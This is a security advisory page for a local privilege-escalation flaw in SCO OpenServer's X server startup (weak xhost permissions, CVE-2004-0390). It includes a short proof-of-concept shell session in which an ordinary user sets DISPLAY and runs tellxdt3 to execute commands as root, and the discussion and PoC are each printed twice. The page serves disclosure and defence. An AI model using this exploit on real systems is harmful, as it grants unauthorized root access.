SCO OpenServer StartX Weak XHost Permissions Vulnerability
BID:2731
Info
SCO OpenServer StartX Weak XHost Permissions Vulnerability
| Bugtraq ID: | 2731 |
| Class: | Configuration Error |
| CVE: |
CVE-2004-0390 |
| Remote: | No |
| Local: | Yes |
| Published: | May 07 2001 12:00AM |
| Updated: | Jul 11 2009 06:06AM |
| Credit: | This vulnerability was announced to Bugtraq by Richard Johnson <[email protected]> on May 7, 2001. |
| Vulnerable: |
SCO Open Server 5.0.7 SCO Open Server 5.0.6 SCO Open Server 5.0.5 SCO Open Server 5.0.4 SCO Open Server 5.0.3 SCO Open Server 5.0.2 SCO Open Server 5.0.1 SCO Open Server 5.0 |
| Not Vulnerable: | |
Discussion
SCO OpenServer StartX Weak XHost Permissions Vulnerability
OpenServer is a Unix based operating system distributed by Santa Cruz Operations.
A problem in access control of the X server could allow a local user to gain elevated privileges. When the X Window System is started via the xhost script, insufficient xhost access control allows a user to execute commands on the desktop. This can be exploited by setting the display environment variable, and using the tellxdt3 program.
This problem makes it possible for a local user to execute commands as root.
OpenServer is a Unix based operating system distributed by Santa Cruz Operations.
A problem in access control of the X server could allow a local user to gain elevated privileges. When the X Window System is started via the xhost script, insufficient xhost access control allows a user to execute commands on the desktop. This can be exploited by setting the display environment variable, and using the tellxdt3 program.
This problem makes it possible for a local user to execute commands as root.
Exploit / POC
SCO OpenServer StartX Weak XHost Permissions Vulnerability
$ pwd
/usr/lib/X11/IXI/XDesktop/bin/i3sc0322
$ DISPLAY=localhost:0
$ export DISPLAY
$ id
uid=232(kevin) gid=101(supp) groups=101(supp),50(group)
$ ./tellxdt3 /usr/bin/id
*** Can't open message catalogue XDesktop3
uid=0(root) gid=3(sys) groups=3(sys),1(other)
$ pwd
/usr/lib/X11/IXI/XDesktop/bin/i3sc0322
$ DISPLAY=localhost:0
$ export DISPLAY
$ id
uid=232(kevin) gid=101(supp) groups=101(supp),50(group)
$ ./tellxdt3 /usr/bin/id
*** Can't open message catalogue XDesktop3
uid=0(root) gid=3(sys) groups=3(sys),1(other)
References
SCO OpenServer StartX Weak XHost Permissions Vulnerability
References:
References: